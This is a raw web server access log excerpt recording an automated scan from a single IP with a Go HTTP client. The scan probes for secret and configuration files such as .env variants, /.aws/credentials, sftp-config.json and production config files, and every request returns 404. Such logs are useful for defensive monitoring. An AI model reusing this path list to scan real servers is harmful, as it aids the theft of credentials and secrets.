62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/acl.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /sftp.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /appsettings.Test.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /src/config/environment.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /sftp-config.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/production.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /api/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /beta/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /.env.prod.local HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /.aws/credentials HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:42 +0800] "GET /laravel/core/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:42 +0800] "GET /config/routes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:42 +0800] "GET /config/production.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:42 +0800] "GET /login/index.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:42 +0800] "GET /.env-sample HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:42 +0800] "GET /temp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:42 +0800] "GET /phpversion.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
